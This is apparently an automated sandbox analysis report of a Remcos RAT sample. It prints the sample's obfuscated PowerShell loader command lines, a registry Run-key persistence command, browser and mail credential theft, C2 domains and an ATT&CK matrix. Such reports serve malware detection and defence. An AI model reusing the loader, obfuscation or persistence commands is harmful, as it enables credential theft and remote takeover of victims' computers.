rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbagJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pvaqv"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sxfiolkk"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\crtbpevmxvde"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#skedekatarer negligent azoparaffin cardinalfishes germens asbestinize mell #>;$vorticularly='conversed';<#unabdicated amagermadens hovedkortene arbejdsvrelsers indehavde storgaard #>;$forlbsmodellen=$paedeutics+$host.ui; function abkhasian($amphivorous){if ($forlbsmodellen) {$knipsendes++;}$scythework=$flyingly+$amphivorous.'length'-$knipsendes; for( $idiocyclophanous=4;$idiocyclophanous -lt $scythework;$idiocyclophanous+=5){$geometrierne=$idiocyclophanous;$faujdar+=$amphivorous[$idiocyclophanous];$unstooped='tinnets';}$faujdar;}function yderzoner($modernes){ . ($syvtallene) ($modernes);}$stenbroer=abkhasian ' ,enmaflboun,uzstreirecelprotlmotoaf na/over ';$stenbroer+=abkhasian 'glds5 ins. mud0 ,io e v(leukwodaxia frnsoffd fdsoopnawkruksconv py mndunstst e p yt1befo0 fug.driv0gy e; ret e uawver isocinforu6 fla4pr,b;rein m lix pe 6cosi4 hem;syn, pterrjakovduks:sv n1v di3mine1oppu.ambu0mi.u)quin un igkar egif,censikslaso cua/ .ut2stad0rute1semi0 san0 for1rum.0u se1tids forsf.natitar r eievaccfexcoo.hanxtaff/ iel1unsk3haan1duel.fre 0baro ';$genbrugelig=abkhasian 'computelts hole jler lge-cormae osgoverebi dnsemitprop ';$bruttonationalprodukternes=abkhasian ' arch udbt aa,tgallp fels,ver: hek/haar/irakpo oilgrc,i isne i tl errtfor,d ins.gipstspawo w rpicos/ pluupneunsothdanthedommr dokbfa gyresag ,kogblokerecolnonhsk lkeba,p. 
.hoagalgaexotfquin ';$margueritha=abkhasian ' epi> nes ';$syvtallene=abkhasian 'aftaifab e aalxmo i ';$trappens='lobale207';$idiocyclophanousnhalerende='\rafting.ans';yderzoner (abkhasian 'proc$si igmotolmaanot.lebfritadikalrem,:rhysecadgminteb slyu ,rosdiacq stuugrune rte=de e$dendesammnsjlevknot:kastaka,tpabsipflandlgdoaud ataffaalbin+chur$hemaimongdtramipegaotradcensnydownckn,glforeofdevpt.onholi,a esenfallo indu echses rnfugthkattaudfolbiblespekrvelmethyrnharmdfdeve und ');yderzoner (abkhasian 'madk$hal.gne.ll accok aibc.stafjerlunsu:andisphilt t nu sugdtille opfnincitintrebletrkonsb ccrregiduddeemedltlary=glat$acupba.barsortuo,klt kyntcluboscabnph nab bbtphyti godoan.inbepaa ollfluopdimar erroforbd hypu u pks mpt nonekongr,aasndaa efodbs.eng.temps nfpsmoolv luiurantth.r( ,eg$ caymsec acontremangautou pluecivircrinide etryothadhsacam.) fld ');yderzoner (abkhasian 'unca[mit.n,ilsequintdat .gymnsduale zemrme,nvlibiieighcvolue fuspalleobordi andnburrt,anzmedicaarsen spoasnorg ,rnetabsrg li] pre:like: s es .ntecantcmisiukon rjerni da tkibbyharup anarordroka itpermojo rcunpoobotrlunde raun=drag afbe[protnkonte rentreto.d hysbrstegrssc reluegnsr infijapht triyalkops orrh jsobefit rchoharmc iboundel.ymbt cirysafepb rbefi t]snuf: pr.: kamtmagnlhiersvice1angl2 vic ');$bruttonationalprodukternes=$studenterbrdet[0];$exhaust=(abkhasian 'phil$omsogtegnlkberominib kr.a,artlpost:smaapinjeaen or t,recelindifftpayehballoworrorigid seu=unafnfulde ,erw kla-de aof.rwbtyrajoveretulrcbount lst rinsreflytjenskhoutp imeprofm mi .kab nindlebag
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#skedekatarer negligent azoparaffin cardinalfishes germens asbestinize mell #>;$vorticularly='conversed';<#unabdicated amagermadens hovedkortene arbejdsvrelsers indehavde storgaard #>;$forlbsmodellen=$paedeutics+$host.ui; function abkhasian($amphivorous){if ($forlbsmodellen) {$knipsendes++;}$scythework=$flyingly+$amphivorous.'length'-$knipsendes; for( $idiocyclophanous=4;$idiocyclophanous -lt $scythework;$idiocyclophanous+=5){$geometrierne=$idiocyclophanous;$faujdar+=$amphivorous[$idiocyclophanous];$unstooped='tinnets';}$faujdar;}function yderzoner($modernes){ . ($syvtallene) ($modernes);}$stenbroer=abkhasian ' ,enmaflboun,uzstreirecelprotlmotoaf na/over ';$stenbroer+=abkhasian 'glds5 ins. mud0 ,io e v(leukwodaxia frnsoffd fdsoopnawkruksconv py mndunstst e p yt1befo0 fug.driv0gy e; ret e uawver isocinforu6 fla4pr,b;rein m lix pe 6cosi4 hem;syn, pterrjakovduks:sv n1v di3mine1oppu.ambu0mi.u)quin un igkar egif,censikslaso cua/ .ut2stad0rute1semi0 san0 for1rum.0u se1tids forsf.natitar r eievaccfexcoo.hanxtaff/ iel1unsk3haan1duel.fre 0baro ';$genbrugelig=abkhasian 'computelts hole jler lge-cormae osgoverebi dnsemitprop ';$bruttonationalprodukternes=abkhasian ' arch udbt aa,tgallp fels,ver: hek/haar/irakpo oilgrc,i isne i tl errtfor,d ins.gipstspawo w rpicos/ pluupneunsothdanthedommr dokbfa gyresag ,kogblokerecolnonhsk lkeba,p. 
.hoagalgaexotfquin ';$margueritha=abkhasian ' epi> nes ';$syvtallene=abkhasian 'aftaifab e aalxmo i ';$trappens='lobale207';$idiocyclophanousnhalerende='\rafting.ans';yderzoner (abkhasian 'proc$si igmotolmaanot.lebfritadikalrem,:rhysecadgminteb slyu ,rosdiacq stuugrune rte=de e$dendesammnsjlevknot:kastaka,tpabsipflandlgdoaud ataffaalbin+chur$hemaimongdtramipegaotradcensnydownckn,glforeofdevpt.onholi,a esenfallo indu echses rnfugthkattaudfolbiblespekrvelmethyrnharmdfdeve und ');yderzoner (abkhasian 'madk$hal.gne.ll accok aibc.stafjerlunsu:andisphilt t nu sugdtille opfnincitintrebletrkonsb ccrregiduddeemedltlary=glat$acupba.barsortuo,klt kyntcluboscabnph nab bbtphyti godoan.inbepaa ollfluopdimar erroforbd hypu u pks mpt nonekongr,aasndaa efodbs.eng.temps nfpsmoolv luiurantth.r( ,eg$ caymsec acontremangautou pluecivircrinide etryothadhsacam.) fld ');yderzoner (abkhasian 'unca[mit.n,ilsequintdat .gymnsduale zemrme,nvlibiieighcvolue fuspalleobordi andnburrt,anzmedicaarsen spoasnorg ,rnetabsrg li] pre:like: s es .ntecantcmisiukon rjerni da tkibbyharup anarordroka itpermojo rcunpoobotrlunde raun=drag afbe[protnkonte rentreto.d hysbrstegrssc reluegnsr infijapht triyalkops orrh jsobefit rchoharmc iboundel.ymbt cirysafepb rbefi t]snuf: pr.: kamtmagnlhiersvice1angl2 vic ');$bruttonationalprodukternes=$studenterbrdet[0];$exhaust=(abkhasian 'phil$omsogtegnlkberominib kr.a,artlpost:smaapinjeaen or t,recelindifftpayehballoworrorigid seu=unafnfulde ,erw kla-de aof.rwbtyrajoveretulrcbount lst rinsreflytjenskhoutp im
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "gummicheckene" /t reg_expand_sz /d "%assumably% -windowstyle 1 $dilatationens=(gp -path 'hkcu:\software\darksomeness\').subtropiske;%assumably% ($dilatationens)"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#skedekatarer negligent azoparaffin cardinalfishes germens asbestinize mell #>;$vorticularly='conversed';<#unabdicated amagermadens hovedkortene arbejdsvrelsers indehavde storgaard #>;$forlbsmodellen=$paedeutics+$host.ui; function abkhasian($amphivorous){if ($forlbsmodellen) {$knipsendes++;}$scythework=$flyingly+$amphivorous.'length'-$knipsendes; for( $idiocyclophanous=4;$idiocyclophanous -lt $scythework;$idiocyclophanous+=5){$geometrierne=$idiocyclophanous;$faujdar+=$amphivorous[$idiocyclophanous];$unstooped='tinnets';}$faujdar;}function yderzoner($modernes){ . ($syvtallene) ($modernes);}$stenbroer=abkhasian ' ,enmaflboun,uzstreirecelprotlmotoaf na/over ';$stenbroer+=abkhasian 'glds5 ins. mud0 ,io e v(leukwodaxia frnsoffd fdsoopnawkruksconv py mndunstst e p yt1befo0 fug.driv0gy e; ret e uawver isocinforu6 fla4pr,b;rein m lix pe 6cosi4 hem;syn, pterrjakovduks:sv n1v di3mine1oppu.ambu0mi.u)quin un igkar egif,censikslaso cua/ .ut2stad0rute1semi0 san0 for1rum.0u se1tids forsf.natitar r eievaccfexcoo.hanxtaff/ iel1unsk3haan1duel.fre 0baro ';$genbrugelig=abkhasian 'computelts hole jler lge-cormae osgoverebi dnsemitprop ';$bruttonationalprodukternes=abkhasian ' arch udbt aa,tgallp fels,ver: hek/haar/irakpo oilgrc,i isne i tl errtfor,d ins.gipstspawo w rpicos/ pluupneunsothdanthedommr dokbfa gyresag ,kogblokerecolnonhsk lkeba,p. 
.hoagalgaexotfquin ';$margueritha=abkhasian ' epi> nes ';$syvtallene=abkhasian 'aftaifab e aalxmo i ';$trappens='lobale207';$idiocyclophanousnhalerende='\rafting.ans';yderzoner (abkhasian 'proc$si igmotolmaanot.lebfritadikalrem,:rhysecadgminteb slyu ,rosdiacq stuugrune rte=de e$dendesammnsjlevknot:kastaka,tpabsipflandlgdoaud ataffaalbin+chur$hemaimongdtramipegaotradcensnydownckn,glforeofdevpt.onholi,a esenfallo indu echses rnfugthkattaudfolbiblespekrvelmethyrnharmdfdeve und ');yderzoner (abkhasian 'madk$hal.gne.ll accok aibc.stafjerlunsu:andisphilt t nu sugdtille opfnincitintrebletrkonsb ccrregiduddeemedltlary=glat$acupba.barsortuo,klt kyntcluboscabnph nab bbtphyti godoan.inbepaa ollfluopdimar erroforbd hypu u pks mpt nonekongr,aasndaa efodbs.eng.temps nfpsmoolv luiurantth.r( ,eg$ caymsec acontremangautou pluecivircrinide etryothadhsacam.) fld ');yderzoner (abkhasian 'unca[mit.n,ilsequintdat .gymnsduale zemrme,nvlibiieighcvolue fuspalleobordi andnburrt,anzmedicaarsen spoasnorg ,rnetabsrg li] pre:like: s es .ntecantcmisiukon rjerni da tkibbyharup anarordroka itpermojo rcunpoobotrlunde raun=drag afbe[protnkonte rentreto.d hysbrstegrssc reluegnsr infijapht triyalkops orrh jsobefit rchoharmc iboundel.ymbt cirysafepb rbefi t]snuf: pr.: kamtmagnlhiersvice1angl2 vic ');$bruttonationalprodukternes=$studenterbrdet[0];$exhaust=(abkhasian 'phil$omsogtegnlkberominib kr.a,artlpost:smaapinjeaen or t,recelindifftpayehballoworrorigid seu=unafnfulde ,erw kla-de aof.rwbtyrajoveretulrcbount lst rinsreflytjenskhoutp imeprofm mi .kab nindlebagJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "gummicheckene" /t reg_expand_sz /d "%assumably% -windowstyle 1 $dilatationens=(gp -path 'hkcu:\software\darksomeness\').subtropiske;%assumably% ($dilatationens)"
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                Source: msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.dr Binary or memory string: [Program Manager]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,13_2_0041881C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,14_2_004082CD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 7104, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: ESMTPPassword 14_2_004033F0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword 14_2_00402DB3
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword 14_2_00402DB3
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 7136, type: MEMORYSTR

Remote Access Functionality

Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TXCR8B
Source: Yara match | File source: 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 7104, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
MITRE ATT&CK Matrix, listed per tactic column (numbers in parentheses are the badge values shown next to each flagged technique, as extracted):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Scripting (11); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (1); Native API (11); Command and Scripting Interpreter (22); PowerShell (1); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Scripting (11); DLL Side-Loading (1); Registry Run Keys / Startup Folder (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (412); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (41); Access Token Manipulation (1); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (11); Credentials in Registry (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (18); Security Software Discovery (21); Virtualization/Sandbox Evasion (41); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Input Capture (11); Clipboard Data (2); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (113); Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1538407 | Sample: rIMG465244247443GULFORDEROp... | Startdate: 21/10/2024 | Architecture: WINDOWS | Score: 100

Start (node 2)
  DNS/IP: pelele.duckdns.org; plieltd.top; geoplugin.net
  Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 10 other signatures
  pelele.duckdns.org: Uses dynamic DNS services
  started: powershell.exe 18 (node 9)
    Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection)
    started: msiexec.exe 8 18 (node 14)
      DNS/IP: pelele.duckdns.org 185.236.203.101, 49738, 49739, 49741 M247GB Romania; geoplugin.net 178.237.33.50, 49740, 80 ATOM86-ASATOM86NL Netherlands
      Dropped: C:\Users\user\AppData\Local\Temp\biljl.vbs, data; C:\ProgramData\remcos\logs.dat, data
      Signatures: Detected Remcos RAT; Tries to steal Mail credentials (via file registry); Maps a DLL or memory area into another process; Installs a global keyboard hook
      started: msiexec.exe 2 (node 25)
        Signatures: Tries to harvest and steal browser information (history, passwords, etc)
      started: msiexec.exe 1 (node 28)
      started: cmd.exe 1 (node 30)
        started: conhost.exe (node 36)
        started: reg.exe 1 1 (node 38)
      started: 2 other processes (node 34)
    started: conhost.exe (node 19)
  started: cmd.exe 1 (node 12)
    Signatures: Suspicious powershell command line found
    started: powershell.exe 14 22 (node 21)
      DNS/IP: plieltd.top 172.67.155.139, 443, 49730, 49737 CLOUDFLARENETUS United States
      Signatures: Found suspicious powershell code related to unpacking or dynamic code loading
      started: conhost.exe (node 32)
    started: conhost.exe (node 23)

Source | Detection | Scanner | Label | Link
rIMG465244247443GULFORDEROpmagasinering.cmd | 24% | Virustotal | | Browse
rIMG465244247443GULFORDEROpmagasinering.cmd | 18% | ReversingLabs | Script-PowerShell.Backdoor.Remcos |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
pelele.duckdns.org | 2% | Virustotal | | Browse
plieltd.top | 0% | Virustotal | | Browse
geoplugin.net | 0% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://www.imvu.comr | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://login.yahoo.com/config/login | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | 0% | URL Reputation | safe |
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
http://www.imvu.com | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://www.ebuddy.com | 0% | URL Reputation | safe |
http://plieltd.top | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pelele.duckdns.org | 185.236.203.101 | true | true | | unknown
plieltd.top | 172.67.155.139 | true | false | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://plieltd.top/Underbyggelse.aaf | false | | unknown
https://plieltd.top/FevmSBTRsrPt160.bin | false | | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
                                                                                                    unknown
                                                                                                    https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03bhvF678.tmp.13.drfalse
                                                                                                      unknown
                                                                                                      https://aefd.nelreports.net/api/report?cat=bingaotbhvF678.tmp.13.drfalse
                                                                                                        unknown
                                                                                                        https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-aebhvF678.tmp.13.drfalse
                                                                                                          unknown
                                                                                                          https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7bhvF678.tmp.13.drfalse
                                                                                                            unknown
                                                                                                            https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFDbhvF678.tmp.13.drfalse
                                                                                                              unknown
                                                                                                              https://aefd.nelreports.net/api/report?cat=bingrmsbhvF678.tmp.13.drfalse
                                                                                                                unknown
                                                                                                                https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993bhvF678.tmp.13.drfalse
                                                                                                                  unknown
                                                                                                                  https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                                                                    unknown
                                                                                                                    https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5bhvF678.tmp.13.drfalse
                                                                                                                      unknown
                                                                                                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.1787742509.0000012080001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3bhvF678.tmp.13.drfalse
                                                                                                                        unknown
                                                                                                                        https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135bhvF678.tmp.13.drfalse
                                                                                                                          unknown
                                                                                                                          https://plieltd.top/Underbyggelse.aafXR$lXpowershell.exe, 00000004.00000002.1967209792.0000000005018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://aka.ms/pscore6lBtqpowershell.exe, 00000004.00000002.1967209792.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
